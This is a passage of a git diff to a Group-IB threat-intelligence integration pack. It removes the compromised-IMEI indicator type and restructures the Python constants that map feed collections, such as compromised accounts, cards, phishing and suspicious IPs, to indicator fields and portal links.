 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
@@ -35,4 +34,4 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json
index adf82d196306..0242874c1fb5 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json
@@ -7,7 +7,6 @@
 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
@@ -34,4 +33,4 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json
index 04cf02a49c08..1042e7664d1c 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json
@@ -5,7 +5,6 @@
 "URL",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json
index fd82575e5c2c..3249a1b43755 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json
@@ -5,7 +5,6 @@
 "URL",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json
index f1a11c332b8e..b5a2f4d6f84c 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json
@@ -5,7 +5,6 @@
 "URL",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json
index c1a151f8abe7..7122b39b91e2 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json
@@ -12,4 +12,4 @@
 "updateAfter": 0,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json
index 513bae42626d..133f9ce13d94 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json
@@ -12,4 +12,4 @@
 "updateAfter": 0,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json
index 79724411e445..29916158e612 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json
@@ -12,4 +12,4 @@
 "updateAfter": 0,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py
index bea7edd8a263..b473f1b68337 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py 
@@ -1,436 +1,1397 @@ - import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * + """ IMPORTS """ -import json -from datetime import datetime, timedelta -from collections.abc import Generator -import dateparser -import urllib3 -import random -from requests.auth import HTTPBasicAuth +from json import dumps as json_dumps +from datetime import datetime + +from dateparser import parse as dateparser_parse +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations import TIPoller +from traceback import format_exc +import re +from enum import Enum # Disable insecure warnings -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +urllib3_disable_warnings(InsecureRequestWarning) + """ CONSTANTS """ DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ" -MAPPING: dict = { + +INDICATORS_TYPES = { "compromised/account_group": { - "date": - "dateFirstSeen", - "name": - "login", - "prefix": - "Compromised Account", - "indicators": - [ - { - "main_field": "events.cnc.url", "main_field_type": "URL" - }, - { - "main_field": "events.cnc.domain", "main_field_type": "Domain" - }, - { - "main_field": "events.cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["events.cnc.ipv4.asn", "events.cnc.ipv4.countryName", "events.cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - }, - { - "main_field": "events.client.ipv4.ip", - } - ] + "types": { + "event_url": "URL", + "event_domain": "Domain", + "events_ipv4_ip": "IP", + }, + "add_fields_types": { + "event_url": {}, + "event_domain": {}, + "events_ipv4_ip": { + "asn": "asn", + "country_name": "geocountry", + "region": "geolocation", + } + }, }, - "compromised/card": { - "date": - "dateDetected", - "name": - "cardInfo.number", - "prefix": - "Compromised Card", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL" - }, - { - "main_field": "cnc.domain", 
"main_field_type": "Domain" - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "compromised/bank_card_group": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "compromised/breached": { - "date": - "uploadTime", - "name": - "email", - "prefix": - "Data Breach", - "indicators": [] + "compromised/mule": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "bp/phishing": { - "date": - "dateDetected", - "name": - "phishingDomain.domain", - "prefix": - "Phishing", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL" - }, - { - "main_field": "phishingDomain.domain", "main_field_type": "Domain", - "add_fields": ["phishingDomain.registrar"], - "add_fields_types": ["registrarname"] - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP" - } - ] + "compromised/card": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "bp/phishing_kit": { - "date": - "dateDetected", - "name": - "hash", - "prefix": - "Phishing Kit", - "indicators": - [ - { - "main_field": "emails", "main_field_type": "Email" - } - ] + "osi/vulnerability": { + "types": { + "id": "CVE", + }, + "markdowns": { + "software_mixed": ( + "| Software 
Name | Software Type | Software Version |\n" + "| ------------- | ------------- | ---------------- |\n" + ) + }, + "add_fields_types": { + "id": { + "cvss_score": "cvss", + "description": "description", + "software_mixed": "gibsoftwaremixed", + "dateLastSeen": "cvemodified", + "datePublished": "published", + "severity": "severity", + } + }, }, - # "bp/domain": { - # "date": - # "ts_create", - # "name": - # "attrs.domain", - # "prefix": - # "Phishing Domain", - # "indicators": - # [ - # { - # "main_field": "attrs.domain", "main_field_type": "Domain", - # "add_fields": ["phishingDomain.registrar"], - # "add_fields_types": ["registrarname"] - # }, - # { - # "main_field": "attrs.server_ip", "main_field_type": "IP", - # "add_fields": ["attrs.server_ip_asn", "attrs.server_ip_country_name", "attrs.server_ip_region"], - # "add_fields_types": ["asn", "geocountry", "geolocation"] - # } - # ] - # }, "osi/git_repository": { - "date": - "dateDetected", - "name": - "name", - "prefix": - "Git Leak", + "types": { + "contributors_emails": "Email", + "hash": "GIB Hash", + }, + "add_fields_types": { + "contributors_emails": {}, + "hash": {} + }, }, - "osi/public_leak": { - "date": - "created", - "name": - "hash", - "prefix": - "Public Leak", + "attacks/phishing_kit": {"types": {"emails": "Email"}, "add_fields_types": {"emails": {}}}, + "attacks/phishing_group": { + "types": { + "url": "URL", + "phishing_domain_domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": {}, + "phishing_domain_domain": {"phishing_domain_registrar": "registrarname"}, + "ipv4_ip": { + "ipv4_country_name": "geocountry", + }, + }, }, - "malware/targeted_malware": { - "date": - "date", - "name": - "injectMd5", - "prefix": - "Targeted Malware", - "indicators": - [ - { - "main_field": "md5", "main_field_type": "File", - "add_fields": ["fileName", "md5", "sha1", "sha256", "size"], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "attacks/deface": { + "types": 
{"url": "URL", "target_domain": "Domain", "target_ip_ip": "IP"}, + "add_fields_types": { + "url": {}, + "target_domain": {}, + "target_ip_ip": { + "target_ip_asn": "asn", + "target_ip_country_name": "geocountry", + "target_ip_region": "geolocation", + } + }, + }, + "attacks/ddos": { + "types": {"cnc_url": "URL", "cnc_domain": "Domain", "cnc_ipv4_ip": "IP"}, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, + }, + "malware/cnc": { + "types": { + "url": "URL", + "domain": "Domain", + }, + "add_fields_types": { + "url": {}, + "domain": { + "ipv4_ip": "IP", + "ipv4_asn": "asn", + "country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/socks_proxy": { + "types": {"ipv4_ip": "IP"}, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, }, + "suspicious_ip/open_proxy": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/tor_node": { + "types": {"ipv4_ip": "IP"}, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/vpn": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + }, + }, + }, + "suspicious_ip/scanner": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + }, + }, + }, + "hi/threat": { + "types": { + "ipv4": "IP", + "domain": "Domain", + "url": "URL", + "hashes_md5": "File", + }, + "add_fields_types": { + "ipv4": {}, + "domain": 
{}, + "url": {}, + "hashes_md5": { + "name": "gibfilename", + "hashes_md5": "md5", + "hashes_sha1": "sha1", + "hashes_sha256": "sha256", + "size": "size", + } + }, + }, + "apt/threat": { + "types": { + "ipv4": "IP", + "domain": "Domain", + "url": "URL", + "hashes_md5": "File", + }, + "add_fields_types": { + "ipv4": {}, + "domain": {}, + "url": {}, + "hashes_md5": { + "name": "gibfilename", + "hashes_md5": "md5", + "hashes_sha1": "sha1", + "hashes_sha256": "sha256", + "size": "size", + } + }, + }, +} +PREFIXES = { + "compromised/account_group": "Compromised Account Group", + "compromised/bank_card_group": "Compromised Card Group", + "compromised/breached": "Data Breach", + "compromised/mule": "Compromised Mule", + "osi/git_repository": "Git Leak", + "osi/public_leak": "Public Leak", + "osi/vulnerability": "OSI Vulnerability", + "attacks/ddos": "Attacks DDoS", + "attacks/deface": "Attacks Deface", + "attacks/phishing_group": "Phishing Group", + "attacks/phishing_kit": "Phishing Kit", + "apt/threat": "Nation-State Cybercriminals Threat Report", + "apt/threat_actor": "Nation-State Cybercriminals Threat Actor Profile", + "hi/threat": "GIB Cybercriminal Threat Report", + "hi/threat_actor": "GIB Cybercriminal Threat Actor Profile", + "suspicious_ip/tor_node": "Suspicious IP Tor Node", + "suspicious_ip/open_proxy": "Suspicious IP Open Proxy", + "suspicious_ip/socks_proxy": "Suspicious IP Socks Proxy", + "suspicious_ip/vpn": "Suspicious IP VPN", + "suspicious_ip/scanner": "Suspicious IP Scanner", + "malware/cnc": "Malware CNC", + "malware/malware": "Malware", +} - "compromised/mule": { - "name": - "account", - "prefix": - "Compromised Mule", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL", - }, - { - "main_field": "cnc.domain", "main_field_type": "Domain", - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", 
"geolocation"] - } - ] +INCIDENT_CREATED_DATES_MAPPING = { + "compromised/account_group": "dateFirstSeen", + "compromised/breached": "uploadTime", + "compromised/mule": ["dateAdd", "dateIncident"], + "compromised/bank_card_group": "dateFirstCompromised", + "osi/git_repository": "dateDetected", + "osi/public_leak": "created", + "osi/vulnerability": "datePublished", + "attacks/ddos": "dateReg", + "attacks/deface": "date", + "attacks/phishing_kit": "dateFirstSeen", + "attacks/phishing_group": ["detected", "updated"], + "apt/threat": "createdAt", + "apt/threat_actor": "createdAt", + "hi/threat": "createdAt", + "hi/threat_actor": "createdAt", + "suspicious_ip/tor_node": "dateFirstSeen", + "suspicious_ip/open_proxy": "dateFirstSeen", + "suspicious_ip/socks_proxy": "dateFirstSeen", + "suspicious_ip/vpn": "dateFirstSeen", + "suspicious_ip/scanner": "dateFirstSeen", + "malware/cnc": "dateFirstSeen", + "malware/malware": "updatedAt", +} + +COLLECTIONS_THAT_MAY_NOT_SUPPORT_ID_SEARCH_VIA_UPDATED = [ + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "osi/public_leak", +] + +SET_WITH_ALL_DATE_FIELDS = { + "dateEnd", + "createdAt", + "updated", + "dateCreated", + "dateFirstSeen", + "dateModified", + "dateLastCompromised", + "added", + "updatedAt", + "created", + "dateAdd", + "dateBegin", + "dateLastSeen", + "blocked", + "detected", + "dateIncident", + "dateFirstCompromised", + "dateDetected", + "datePublished", + "dateReg", + "date", + "validThruDate", + "datecompromised", + "dateDetected", +} + +TABLES_MAPPING = { + "compromised/account_group": ["events_table"], + "compromised/bank_card_group": ["threatActor", "compromised_events", "malware"], + "osi/git_repository": ["files"], + "osi/public_leak": ["linkList", "matches"], + "osi/vulnerability": ["cpeTable", "affectedSoftware"], + "attacks/phishing_kit": ["downloadedFrom"], + "malware/cnc": ["threatActor", "malwareList"], + "malware/malware": ["taList"], + "hi/threat": ["forumsAccounts"], 
+ "hi/threat_actor": ["reports"], + "apt/threat_actor": ["reports"], + "apt/threat": ["forumsAccounts"], +} + +HTML_FIELDS = { + "apt/threat_actor": ["description"], + "apt/threat": ["description"], + "malware/malware": ["description", "shortDescription"], + "hi/threat": ["description"], + "hi/threat_actor": ["description"], + "osi/public_leak": ["data"], +} + +PORTAL_LINKS = { + "compromised/account_group": "https://tap.group-ib.com/cd/accounts?id=", + "compromised/breached": "https://tap.group-ib.com/cd/breached?id=", + "compromised/bank_card_group": "https://tap.group-ib.com/cd/cards?id=", + "compromised/mule": "https://tap.group-ib.com/cd/mules?id=", + "hi/threat": "https://tap.group-ib.com/ta/last-threats?threat=", + "hi/threat_actor": "https://tap.group-ib.com/ta/actors?ta=", + "apt/threat": "https://tap.group-ib.com/ta/last-threats?threat=", + "apt/threat_actor": "https://tap.group-ib.com/ta/actors?ta=", + "attacks/ddos": "https://tap.group-ib.com/attacks/ddos?id=", + "attacks/deface": "https://tap.group-ib.com/attacks/deface?q=id:", + "attacks/phishing_group": "https://tap.group-ib.com/attacks/phishing?scope=all&q=id:", + "attacks/phishing_kit": "https://tap.group-ib.com/malware/phishing-kit?p=1&q=", + "malware/malware": "https://tap.group-ib.com/malware/reports/", + "osi/git_repository": "https://tap.group-ib.com/cd/git-leaks?id=", + "osi/public_leak": "https://tap.group-ib.com/cd/leaks?id=", + "osi/vulnerability": "https://tap.group-ib.com/malware/vulnerabilities?p=1&scope=all&q=", + "suspicious_ip/tor_node": "https://tap.group-ib.com/suspicious/tor?q=", + "suspicious_ip/open_proxy": "https://tap.group-ib.com/suspicious/proxies?q=", + "suspicious_ip/socks_proxy": "https://tap.group-ib.com/suspicious/socks?q=", + "suspicious_ip/scanner": "https://tap.group-ib.com/suspicious/scanning?ip=", + "suspicious_ip/vpn": "https://tap.group-ib.com/suspicious/vpn?q=", +} + +COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES = ["osi/git_repository", "osi/public_leak", 
"compromised/breached"] + +COLLECTIONS_FOR_WHICH_THE_PORTAL_LINK_WILL_BE_GENERATED = ["compromised/breached"] + + +class NumberedSeverity(Enum): + LOW = 1 + MEDIUM = 2 + HIGH = 3 + + +class StringSeverity(Enum): + LOW = "Low" + MEDIUM = "Medium" + HIGH = "High" + + +MAPPING = { + "compromised/account_group": { # GIB Source:sourceType, severity:systemSeverity + "name": "login", + # Information from Group-IB + "id": "id", # GIB ID + "login": "login", # GIB Compromised Login + "password": "password", # GIB Password + "parsedLogin": { + "domain": "parsedLogin.domain", # GIB Parsed Login Domain + "ip": "parsedLogin.ip", # GIB Parsed Login IP + }, + "service": { + "domain": "service.domain", # GIB Service Domain + "ip": "service.ip", # GIB Service IP + "url": "service.url", # GIB Service URL + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("compromised/account_group"), + "dynamic": "id", + } + }, + "events_table": { # GIB Compromised Events Information Table + "cnc": "events.cnc.cnc", + "asn": "events.client.ipv4.asn", + "city": "events.client.ipv4.city", + "region": "events.client.ipv4.region", + "provider": "events.client.ipv4.provider", + "countryCode": "events.client.ipv4.countryCode", + "ip": "events.client.ipv4.ip", + "malware": "events.malware.name", + "threatActor": "events.threatActor.name", + "dateDetected": "events.dateDetected", + "dateCompromised": "events.dateCompromised", + "phone": "events.person.phone", + "name": "events.person.name", + "email": "events.person.email", + "address": "events.person.address", + }, + # END Information from Group-IB + # Group-IB Dates + "dateFirstCompromised": "dateFirstCompromised", # GIB Date First Compromised + "dateLastCompromised": "dateLastCompromised", # GIB Date Last Compromised + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + # END Group-IB Dates + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": 
"evaluation.admiraltyCode", # GIB Admiralty Code
+ "credibility": "evaluation.credibility", # GIB Credibility
+ "reliability": "evaluation.reliability", # GIB Reliability
+ "severity": "evaluation.severity", # GIB Severity
+ },
+ # END Group-IB Evaluation
+ "indicators": { # GIB Related Indicators Data
+ "event_url": "events.cnc.url",
+ "event_domain": "events.cnc.domain",
+ "events_ipv4_ip": "events.cnc.ipv4.ip",
+ "asn": "events.client.ipv4.asn",
+ "country_name": "events.client.ipv4.countryName",
+ "region": "events.client.ipv4.region",
+ },
 },
- "compromised/imei": {
- "name":
- "device.imei",
- "prefix":
- "Compromised IMEI",
- "indicators":
- [
- {
- "main_field": "cnc.url", "main_field_type": "URL",
- },
- {
- "main_field": "cnc.domain", "main_field_type": "Domain",
- },
- {
- "main_field": "cnc.ipv4.ip", "main_field_type": "IP",
- "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"],
- "add_fields_types": ["asn", "geocountry", "geolocation"]
- }
- ]
+ "compromised/bank_card_group": { # GIB Source:sourceType, severity:systemSeverity
+ "name": "cardInfo.number",
+ # Card Info From Group-IB
+ "issuer": "cardInfo.issuer.issuer", # GIB Card Issuer
+ "number": "cardInfo.number", # GIB Card Number
+ "type": "cardInfo.type", # GIB Card Type
+ "payment_system": "cardInfo.system", # GIB Payment System
+ # End Card Info From Group-IB
+ # Information from Group-IB
+ "id": "id", # GIB ID
+ "compromised_events": { # GIB Compromised Events Table
+ "valid_thru_date": "events.cardInfo.validThruDate",
+ "valid_thru": "events.cardInfo.validThru",
+ "client_ip": "events.client.ipv4.ip",
+ "cnc": "events.cnc.cnc",
+ "cnc_ip": "events.cnc.ipv4.ip",
+ "threat_actor_name": "events.threatActor.name",
+ "date_compromised": "events.dateCompromised",
+ "victim_phone": "events.owner.phone",
+ "victim_name": "events.owner.name",
+ "malware": "events.malware.name",
+ },
+ "malware": { # GIB Malware Table
+ "id": "malware.id",
+ "name": "malware.name",
+ },
+
"portalLink": { # GIB Portal Link
+ "__concatenate": {
+ "static": PORTAL_LINKS.get("compromised/bank_card_group"),
+ "dynamic": "id",
+ }
+ },
+ # End Information from Group-IB
+ # Group-IB Evaluation
+ "evaluation": {
+ "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code
+ "credibility": "evaluation.credibility", # GIB Credibility
+ "reliability": "evaluation.reliability", # GIB Reliability
+ "severity": "evaluation.severity", # GIB Severity
+ },
+ # END Group-IB Evaluation
+ # Group-IB Dates
+ "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen
+ "dateLastSeen": "dateLastSeen", # GIB Date Last Seen
+ "dateFirstCompromised": "dateFirstCompromised", # GIB Date First Compromised
+ "dateLastCompromised": "dateLastCompromised", # GIB Date Last Compromised
+ # END Group-IB Dates
+ # Threat Actor
+ "threatActor": { # GIB Threat Actors Table
+ "id": "threatActor.id",
+ "name": "threatActor.name",
+ },
+ # End Threat Actor
+ "indicators": { # GIB Related Indicators Data
+ "cnc_url": "events.cnc.url",
+ "cnc_domain": "events.cnc.domain",
+ "cnc_ipv4_ip": "events.cnc.ipv4.ip",
+ "cnc_ipv4_asn": "events.cnc.ipv4.asn",
+ "cnc_ipv4_country_name": "events.cnc.ipv4.countryName",
+ "cnc_ipv4_region": "events.cnc.ipv4.region",
+ },
 },
- "attacks/ddos": {
- "name":
- "target.ipv4.ip",
- "prefix":
- "Attacks DDoS",
- "indicators":
- [
- {
- "main_field": "cnc.url", "main_field_type": "URL",
- },
- {
- "main_field": "cnc.domain", "main_field_type": "Domain",
- },
- {
- "main_field": "cnc.ipv4.ip", "main_field_type": "IP",
- "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"],
- "add_fields_types": ["asn", "geocountry", "geolocation"]
- },
- ]
+ "compromised/breached": { # GIB Source:sourceType, severity:systemSeverity
+ "name": "id",
+ # Information from Group-IB
+ "id": "id", # GIB ID
+ "leakName": "leakName", # GIB Leak Name
+ "passwords": "password", # GIB Passwords
+ "description": "description", # Description
+ "emails": "email", # GIB
Emails
+ "emailDomains": "addInfo.emailDomain", # GIB Email Domains
+ "portalLink": "set_generated_portal_link", # GIB Portal Link
+ # END Information from Group-IB
+ # Group-IB Evaluation
+ "evaluation": {
+ "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code
+ "credibility": "evaluation.credibility", # GIB Credibility
+ "reliability": "evaluation.reliability", # GIB Reliability
+ "severity": "evaluation.severity", # GIB Severity
+ },
+ # END Group-IB Evaluation
+ # Group-IB Dates
+ "leakPublished": "leakPublished", # GIB Leak Published
+ "updateTime": "updateTime", # GIB Update Time
+ "uploadTime": "uploadTime", # GIB Upload Time
+ # END Group-IB Dates
 },
- "attacks/deface": {
- "name":
- "url",
- "prefix":
- "Attacks Deface",
- "indicators":
- [
- {
- "main_field": "url", "main_field_type": "URL",
- },
- {
- "main_field": "targetDomain", "main_field_type": "Domain",
- },
- {
- "main_field": "targetIp.ip", "main_field_type": "IP",
- "add_fields": ["targetIp.asn", "targetIp.countryName", "targetIp.region"],
- "add_fields_types": ["asn", "geocountry", "geolocation"]
- }
- ]
+ "compromised/mule": { # GIB Source:sourceType, severity:systemSeverity
+ "name": "account",
+ # Information from Group-IB
+ "id": "id", # GIB ID
+ "hash": "hash", # GIB Data Hash
+ "dateAdd": "dateAdd", # GIB Date Add
+ "dateIncident": "dateIncident", # GIB Date Incident
+ "organization": {
+ "bic": "organization.bic", # GIB Organization BIC
+ "bsb": "organization.bsb", # GIB Organization BSB
+ "iban": "organization.iban", # GIB Organization IBAN
+ "name": "organization.name", # GIB Organization Name
+ "swift": "organization.swift", # GIB Organization SWIFT
+ "clabe": "organization.clabe", # GIB Organization CLABE
+ },
+ "account": "account", # GIB Compromised Account
+ "portalLink": { # GIB Portal Link
+ "__concatenate": {
+ "static": PORTAL_LINKS.get("compromised/mule"),
+ "dynamic": "id",
+ }
+ },
+ # END Information from Group-IB
+ # Group-IB Evaluation
+ "evaluation": {
+
"admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, - "attacks/phishing": { - "name": - "phishingDomain.domain", - "prefix": - "Phishing", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL", - }, - { - "main_field": "phishingDomain.domain", "main_field_type": "Domain", - "add_fields": ["phishingDomain.registrar"], - "add_fields_types": ["registrarname"] - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "osi/git_repository": { # GIB Source:sourceType, severity:systemSeverity + # Information from Group-IB + "id": "id", # GIB ID + "name": "name", + "leaked_file_name": "name", # GIB Leaked File Name + "source": "source", # GIB GIT Source + "dateDetected": "dateDetected", # GIB Date of Detection + "dateCreated": "dateCreated", # GIB Date Created + "files": { # GIB OSI Git Repository Files Table + "file_id": "files.id", + "file_name": "files.name", + "hash": "files.revisions.hash", + "dateCreated": "files.dateCreated", + "dateDetected": "files.dateDetected", + "authorName": "files.revisions.info.authorName", + "authorEmail": "files.revisions.info.authorEmail", + "url": "files.url", + "dataFound": "files.dataFound", + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/git_repository"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { 
+ "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "hash": "files.revisions.hash", + "contributors_emails": "contributors.authorEmail", + }, }, - "attacks/phishing_kit": { - "name": - "emails", - "prefix": - "Phishing Kit", - "indicators": - [ - { - "main_field": "emails", "main_field_type": "Email", - } - ] + "osi/public_leak": { # GIB Source:sourceType, severity:systemSeverity + "name": "hash", + # Information from Group-IB + "id": "id", # GIB ID + "hash": "hash", # GIB Data Hash + "created": "created", # GIB Date Created + "data": "data", # GIB Leaked Data + "linkList": { # GIB Link List Table + "author": "linkList.author", + "hash": "linkList.hash", + "link": "linkList.link", + "title": "linkList.title", + "source": "linkList.source", + "dateDetected": 